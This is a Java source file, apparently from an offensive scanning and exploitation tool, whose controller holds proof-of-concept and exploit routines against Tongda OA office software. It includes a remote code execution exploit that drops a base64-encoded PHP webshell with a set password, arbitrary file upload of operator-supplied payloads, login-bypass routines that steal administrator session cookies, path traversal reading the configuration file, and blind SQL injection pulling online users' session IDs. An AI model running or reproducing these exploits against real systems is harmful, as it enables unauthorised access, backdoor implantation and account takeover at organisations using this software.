package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;

import java.net.MalformedURLException;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@BasicMapping(uri = "通达")
public class TongDaController extends Controller implements BasicController{
    final static Base64.Encoder encoder = Base64.getEncoder();
    final static Base64.Decoder decoder = Base64.getDecoder();
    public static String encoder(String text) {
        return encoder.encodeToString(text.getBytes(StandardCharsets.UTF_8));
    }
    public TongDaController(){}
    @VulnerabilityDescriptionMapping(Description = "通达OA V11.x远程代码执行漏洞",SupportVulType = SupportVul.UploadFile)
    public void vul_tongdav11rce(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  通达OA V11.x远程代码执行漏洞");

        String url = "/general/appbuilder/web/portal/gateway/getdata?activeTab=shellcode&id=19&module=Carouselimage";
        switch (type) {
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String exppaload1 = "%E5%27%19,1%3D%3Eprint_r(__file__))%3B/*";
                String exppaload2 = "file_put_contents(\"path\",base64_decode(\"PD9waHAgY2xhc3MgdGVzdHsgICAgcHVibGljICRuYW1lOyAgICBmdW5jdGlvbiBfX3dha2V1cCgpeyAgICAgICBldmFsKCIvKidBQUFkYXd3YWR3YWQnKi8iLiR0aGlzLT5uYW1lLiIvKicxNjFBV0RBV0RBVycqLyIpOyAgICB9fSR0ZXN0MyA9IHVuc2VyaWFsaXplKCRfR0VUWydhJ10pOz8+\"));";
                String expshellpath = Utils.getRandomString(4)+".php";
                HttpRequest httpRequest = new HttpRequest(target + url.replace("shellcode",exppaload1));
                Response response = httpRequest.Get("");

                Pattern pattern = Pattern.compile(".*webroot");
                Matcher id = pattern.matcher(response.responseBody);
                String id1;
//                String id3;
                if (id.find()) {
                    id1 = id.group(0);
                    exppaload2 = encoder(exppaload2.replace("path",id1+"\\"+expshellpath));
                    HttpRequest httpRequest1 = new HttpRequest(target+url.replace("shellcode","%E5%27%19,1%3D%3Eeval(base64_decode(\""+exppaload2+"\")))%3B/*"));
                    httpRequest1.Get("");
                    WriteExpLog("[*]   上传成功\r\n");
                    WriteExpLog("[*}   上传路径为:"+target+"/"+expshellpath+"?a=O:4:\"test\":1:{s:4:\"name\";s:22:\"eval($_POST['b'].';');\";}");
                    WriteExpLog("\r\n");
                    WriteExpLog("[*]   请使用蚁剑进行连接，密码为b");
                }
                break;
            case POC:
                String pocpayload = "%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==%22)))%3B/*";
                HttpRequest httpRequest3 = new HttpRequest(target+url.replace("shellcode",pocpayload));
                Response response1 = httpRequest3.Get("");
                if (response1.responseBody.contains("jodwahfoiawjifowadw")){
                    WriteLog("\r\n");
                    WriteLog("【*】   存在通达OA V11.x远程代码执行漏洞");
                }else {
                    WriteLog("【-】   不存在通达OA V11.x远程代码执行漏洞");
                }

        }
    }


    @VulnerabilityDescriptionMapping(Description = "通达_OA_logincheck_code_php_登陆绕过漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_logincheck(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  通达_OA_logincheck_code_php_登陆绕过漏洞");

        String url = "/ispirit/login_code.php";
        String url1 = "/logincheck_code.php";
        String data = "UID=1&CODEUID=_PC";
        switch (type) {
            case EXP:
                WriteExpLog("\n 通达_OA_logincheck_code_php_登陆绕过漏洞未有exp");
                break;
            case POC:
//                target = target + url;
                HttpRequest httpRequest = new HttpRequest(target+url);
                HttpRequest httpRequest1 = new HttpRequest(target+url1);
                Response response = httpRequest.Get("");
                Pattern pattern = Pattern.compile("codeuid.*authcode");
                Matcher id = pattern.matcher(response.responseBody);
                String id1;
                String id3;
                if (id.find()){
                    id1 = id.group(0).replace("codeuid\":\"{","").replace("}\",\"authcode","");
                    Response result = httpRequest1.Post(data+id1);

                    id3 = String.valueOf(result.responseHeader);
                    Pattern pattern2 = Pattern.compile("PHPSESSID.*path=/");
                    Matcher id4 = pattern2.matcher(id3);
                    String id5 ;
                    if (id4.find()){
                        id5 = id4.group();
                        if (result.statusCode==200 && result.responseBody.contains("general\\/index.php")){
                            WriteLog("\n 通达_OA_logincheck_code_php_登陆绕过漏洞 存在漏洞\r\n");
                            WriteLog("请复制以下cookie并对请求包进行替换，然后访问"+target+"/general/\r\n");
                            WriteLog(id5);}else {
                            WriteLog("\r\n");
                            WriteLog("[-]通达_OA_logincheck_code_php_登陆绕过漏洞 不存在漏洞");
                        }
                    }

                }else {
                    WriteLog("\r\n");
                    WriteLog("[-]通达_OA_logincheck_code_php_登陆绕过漏洞 不存在漏洞");
                }

        }
    }

@VulnerabilityDescriptionMapping(Description = "通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_get_contactlist信息泄露(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞");

    String url = "/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3";
    switch (type) {
        case EXP:
            WriteLog("\n vul_get_contactlist信息泄露 没有Exp");
            break;
        case POC:
            target = target + url;
            HttpRequest httpRequest = new HttpRequest(target);
            Response response = httpRequest.Get("");
            if (response.statusCode==200){
                WriteLog("\n vul_get_contactlist信息泄露 存在漏洞");
            }else {
                WriteLog("\n vul_get_contactlist信息泄露 不存在漏洞");
            }
    }
}
@VulnerabilityDescriptionMapping(Description = "通达OA v2017 action_upload.php 任意文件上传漏洞",SupportVulType =SupportVul.UploadFile )
    public void vul_action_upload文件上传(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  通达OA v2017 action_upload.php 任意文件上传漏洞");

    String url = "/module/ueditor/php/action_upload.php?action=uploadfile";
    String data = "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[fileFieldName]\"\r\n" +
            "\r\n" +
            "ffff\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[fileMaxSize]\"\r\n" +
            "\r\n" +
            "1000000000\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[filePathFormat]\"\r\n" +
            "\r\n" +
            "tcmd\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[fileAllowFiles][]\"\r\n" +
            "\r\n" +
            ".php\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"ffff\"; filename=\"test.php\"\r\n" +
            "Content-Type: application/octet-stream\r\n" +
            "\r\n" +
            "<?php phpinfo();?>\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"mufile\"\r\n" +
            "\r\n" +
            "submit\r\n" +
            "-----------------------------55719851240137822763221368724--";
    switch (type) {
        case EXP:

            if (args!=null){
                String path = (String) args[0];
                String mypayload = "";
                String RandomExp =Utils.getRandomString(5);
                try {
                    byte[] bytes = Utils.readFile(path);
                    mypayload = new String(bytes);
                }catch (Exception e){
                    WriteExpLog("\n [*] 文件读取失败");
                }
                data = data.replace("tcmd","RandomExp");
                data = data.replace("<?php phpinfo();?>",mypayload);
                HttpRequest httpRequest = new HttpRequest(target + url);
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=---------------------------55719851240137822763221368724");
                Response response = httpRequest.Post(data);

                HttpRequest httpRequest2 = new HttpRequest(target + "/"+RandomExp+".php");
                Response response2 = httpRequest2.Get("");

                if (response.statusCode==200 && response2.statusCode==200){
                    WriteLog("\n vul_action_upload文件上传 存在漏洞");
                }else {
                    WriteLog("\n vul_action_upload文件上传 不存在漏洞");
                }
            }else {
                WriteExpLog("\n 请指定文件路径");
            }
            break;
        case POC:

            HttpRequest httpRequest = new HttpRequest(target + url);
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=---------------------------55719851240137822763221368724");
            Response response = httpRequest.Post(data);

            HttpRequest httpRequest2 = new HttpRequest(target + "/tcmd.php");
            Response response2 = httpRequest2.Get("");

            if (response.statusCode==200 && response2.statusCode==200){
                WriteLog("\n vul_action_upload文件上传 存在漏洞");
            }else {
                WriteLog("\n vul_action_upload文件上传 不存在漏洞");
            }
    }
}

@VulnerabilityDescriptionMapping(Description = "通达OA v11.5 login_code.php 任意用户登录",SupportVulType = SupportVul.信息泄露)
    public void vul_session泄露(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  通达OA v11.5 login_code.php 任意用户登录");

    switch (type) {
        case EXP:
            WriteLog("\n[*] vul_信息泄露漏洞 没有Exp");
            break;
        case POC:
            getV11Session(target);
    }
}
@VulnerabilityDescriptionMapping(Description = "通达OA v11.9 upsharestatus 后台SQL注入漏洞" ,SupportVulType = SupportVul.SQLInjection)
public void vul_upsharestatusSqlInjection(Poc_Exp type, String target,Object... args){
    switch (type) {
        case EXP:
            WriteLog("\n vul_upsharestatusSqlInjection 没有Exp");
            break;
        case POC:
            WriteLog("\n 漏洞需要相关参数，无法自动验证 http://www.i-dock.net/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20upsharestatus%20%E5%90%8E%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html");
    }
}

@VulnerabilityDescriptionMapping(Description = "通达OA v11.8 api.ali.php 任意文件上传漏洞", SupportVulType = SupportVul.UploadFile)
public void vul_api_ali_UploadFile(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  通达OA v11.8 api.ali.php 任意文件上传漏洞");

    switch (type) {
        case EXP:
            WriteExpLog("\n vul_api_ali_UploadFile 没有Exp");
            WriteExpLog("\n 移步看: http://www.i-dock.net/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.8%20api.ali.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html");
            break;
        case POC:
            String data = "\n" +
                    "--502f67681799b07e4de6b503655f5cae\r\n" +
                    "Content-Disposition: form-data; name=\"file\"; filename=\"fb6790f4.json\"\r\n" +
                    "Content-Type: application/octet-stream\r\n" +
                    "\r\n" +
                    "{\"modular\":\"AllVariable\",\"a\":\"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==\",\"dataAnalysis\":\"{\\\"a\\\":\\\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\\\"}\"}\r\n" +
                    "--502f67681799b07e4de6b503655f5cae--\r\n";
            HttpRequest httpRequest = new HttpRequest(target+"/mobile/api/api.ali.php");
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae");
            httpRequest.Post(data);

            HttpRequest httpRequest1 = new HttpRequest(target+"/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2209/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4");
            Response response = httpRequest1.Get("");
            if (response.responseBody.contains("OK")){
                WriteLog("vul_api_ali_UploadFile 存在漏洞");
            }else {
                WriteLog("\nvul_api_ali_UploadFile 不存在漏洞");
            }

    }
}
public Boolean getV11Session(String target) throws MalformedURLException {
    try {
        String checkUrl = target + "/general/login_code.php";

        String resText = new HttpRequest(checkUrl).Get("").responseBody;
        String[] resTextSplit = resText.split("\\{");
        String codeUid = resTextSplit[resTextSplit.length-1].replace("}\"}", "").replace("\r\n", "");
        String data = "CODEUID=" + codeUid + "&UID=1"; //{'CODEUID': '{'+codeUid+'}', 'UID': int(1)}；
        Response response = new HttpRequest(target + "/logincheck_code.php").Post(data);

        HttpRequest req = new HttpRequest(target + "/general/index.php");
        String tmp_cookie= null;
        //检测
        try {
            tmp_cookie = response.responseHeader.get("Set-Cookie").toString();
            tmp_cookie = tmp_cookie.replace("[","");
            tmp_cookie = tmp_cookie.replace("]","");
            req.addHeaders("Cookie", tmp_cookie);

        }catch (Exception e){

        }
        Response response1 = req.Get("");

        if (!response1.responseBody.contains("window.top.location='/'")) {
                WriteLog("\n getV11Session 检测到漏洞 Session：" + response1.requestHeader.get("Cookie"));
                WriteLog("\n 拿着session 去登录" + target+"/general/index.php");

            return true;
        } else {
            WriteLog("\n getV11Session 未检测到漏洞 ");
            return false;
        }


    } catch (Exception e) {
        WriteLog("\n function getV11Session 出现异常");
        return false;
    }
}

//@VulnerabilityDescriptionMapping(Description = "通达OA登录认证绕过 header.inc.php?_ZQA_ID=3fb5b8eadff9c793",SupportVulType = SupportVul.信息泄露)
//public void vul_header_inc(Poc_Exp type, String target,Object... args){
//        WriteLog("通达OA登录认证绕过 header.inc.php?_ZQA_ID=3fb5b8eadff9c793");
//
//    switch (type) {
//        case EXP:
//            WriteLog("\n vul_upsharestatusSqlInjection 没有Exp");
//            break;
//        case POC:
//            WriteLog("\n 漏洞需要相关参数，无法自动验证 http://www.i-dock.net/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20upsharestatus%20%E5%90%8E%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html");
//    }
//
//}

    @VulnerabilityDescriptionMapping(Description = "通达OA v2017 video_file.php 任意文件下载漏洞",SupportVulType = SupportVul.信息泄露)
public void vul_header_inc(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("通达OA v2017 video_file.php 任意文件下载漏洞");
    String url = "/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php";
    switch (type) {
        case EXP:
            WriteLog("\n 信息泄露 没有Exp");
            break;
        case POC:
            HttpRequest httpRequest_poc = new HttpRequest(target+url);
            Response response = httpRequest_poc.Get("");
            if (response.statusCode==200&& response.responseBody.contains("ROOT_PATH")){
                WriteSuccessLog("存在漏洞 通达OA v2017 video_file.php 任意文件下载漏洞");
            }else {
                WriteFailLog("不存在漏洞");
            }
    }

}

@VulnerabilityDescriptionMapping(Description = "通达OA v11.5 swfupload_new.php SQL注入漏洞",SupportVulType = SupportVul.SQLInjection)
public void vul_swfupload_new(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("通达OA v11.5 swfupload_new.php SQL注入漏洞");
    String url = "/general/file_folder/swfupload_new.php";
    String data = "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"ATTACHMENT_ID\"\r\n" +
            "\r\n" +
            "1\r\n" +
            "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"ATTACHMENT_NAME\"\r\n" +
            "\r\n" +
            "1\r\n" +
            "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"FILE_SORT\"\r\n" +
            "\r\n" +
            "2\r\n" +
            "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"SORT_ID\"\r\n" +
            "\r\n" +
            "------------GFioQpMK0vv2--\r\n";
    switch (type) {
        case EXP:
            WriteLog("\n SQL注入 没有Exp");
            break;
        case POC:
            HttpRequest httpRequest_poc = new HttpRequest(target+url);
            httpRequest_poc.addHeaders("multipart/form-data","multipart/form-data; boundary=----------GFioQpMK0vv2");
            Response response = httpRequest_poc.Post(data);

            if (response.statusCode==200&& response.responseBody.contains("FILE_CONTENT")){
                WriteSuccessLog("存在漏洞 ");
                WriteLog(response.responseBody);
            }else {
                WriteFailLog("不存在漏洞");
            }
    }
}


@VulnerabilityDescriptionMapping(Description = "通达OA v11.6 insert SQL注入漏洞",SupportVulType = SupportVul.SQLInjection)
public void vul_insert(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("通达OA v11.6 insert SQL注入漏洞");
    String url = "/general/document/index.php/recv/register/insert";
    switch (type) {
        case EXP:
            WriteLog("\n SQL注入 没有Exp");
            break;
        case POC:
            HttpRequest httpRequest_poc1 = new HttpRequest(target+url);
            String data = "title)values(\"'\"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=";
            Response response = httpRequest_poc1.Post(data);

            if (response.statusCode==302){
                WriteSuccessLog("存在漏洞 ");
                WriteLog(response.responseBody);
                HttpRequest httpRequest_poc2 = new HttpRequest(target+url);
                String data2 = "title)values(\"'\"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=";
                Response response2 = httpRequest_poc1.Post(data);
                WriteLog("在线用户session：拿着session访问/general/index.php"+response2.responseBody);

            }else {
                WriteFailLog("不存在漏洞 状态码:"+response.statusCode);
            }
    }
}

    @VulnerabilityDescriptionMapping(Description = "通达OA v11.7 auth_mobi.php 在线用户登录漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_auth_mobi(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("通达OA v11.7 auth_mobi.php 在线用户登录漏洞");
        String url = "/mobile/auth_mobi.php?Avatar=1&uid=1&P_VER=1";
        switch (type) {
            case EXP:
                WriteLog("\n SQL注入 没有Exp");
                break;
            case POC:
                HttpRequest httpRequest_poc1 = new HttpRequest(target+url);
                Response response = httpRequest_poc1.Get("");
                if (response.statusCode==200&& !response.responseBody.contains("RELOGIN")){
                    WriteSuccessLog("存在漏洞 ");
                    WriteLog(response.responseHeader.get("Set-Cookie").toString());
                }else {
                    WriteFailLog("未检测到漏洞 ");
                }
        }
    }

    @VulnerabilityDescriptionMapping(Description = "通达OA v11.8 getway.php 远程文件包含漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_getway_php(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("通达OA v11.8 getway.php 远程文件包含漏洞");
        String url = "/ispirit/interface/gateway.php";
        switch (type) {
            case EXP:
                WriteLog("\n SQL注入 没有Exp");
                break;
            case POC:
                HttpRequest httpRequest_poc1 = new HttpRequest(target+url);
                String data = "json={\"url\":\"/general/../../nginx/logs/oa.access.log\"}";
                Response response = httpRequest_poc1.Post(data);
                if (response.statusCode==200&& !response.responseBody.contains("ERROR URL")){
                    HttpRequest httpRequest_poc2 = new HttpRequest(target+"/mac/gateway.php");
                    String data2 = "json={\"url\":\"/general/../../nginx/logs/oa.access.log\"}";
                    Response response2 = httpRequest_poc2.Post(data2);
                    if (response2.statusCode==200&&response2.responseBody.contains("POST")){
                        WriteSuccessLog("存在漏洞");
                    }else {
                        WriteFailLog("未检测到包含到日志文件 请手动测试");
                    }
                }else {
                    WriteFailLog("未检测到漏洞 ");
                }
        }
    }


    public void get2017Session(String target){
    try {
        String checkUrl = target + "/ispirit/login_code.php";

        String resText = new HttpRequest(checkUrl).Get("").responseBody;
        JSONObject json = JSONObject.parseObject(resText);

        String codeUid = (String) json.get("codeuid");
        String data = "codeuid=" + codeUid + "&UID=1&source=pc&type=confirm&username=admin"; //{'CODEUID': '{'+codeUid+'}', 'UID': int(1)}；
        Response response = new HttpRequest(target + "/general/login_code_scan.php").Post(data);
        JSONObject json2 = JSONObject.parseObject(response.responseBody);

        String status = (String) json2.get("status");
        if (status.contains("1")){
            String check = target + "/ispirit/login_code_check.php?codeuid=" + codeUid;
            HttpRequest req = new HttpRequest(check);
            Response response1 = req.Get("");
            //获取cookie
            String tmp_cookie = null;

            String index = target + "/general/index.php";
            HttpRequest request = new HttpRequest(index);
            try {
                tmp_cookie = response1.responseHeader.get("Set-Cookie").toString();
                tmp_cookie = tmp_cookie.replace("[","");
                tmp_cookie = tmp_cookie.replace("]","");
                request.addHeaders("Cookie", tmp_cookie);

            }catch (Exception e){

            }
            Response response2 =  request.Get("");
            if (!response2.responseBody.contains("window.top.location='/'")) {
                WriteLog("\n getV11Session 检测到漏洞 Session：" + response2.requestHeader.get("Cookie"));
                WriteLog("\n 拿着session 去登录" + target+"/general/index.php");

                return ;
            } else {
                WriteLog("\n getV11Session 未检测到漏洞 ");
                return ;
            }
        }else {

        }





    } catch (Exception e) {
        WriteLog("\n function getV11Session 出现异常");
        return ;
    }
}
    public static void main(String[] args) {
        List<String> test = new ArrayList<>();
        test.add("123");
        test.add("456");
        System.out.println(test);
    }
}
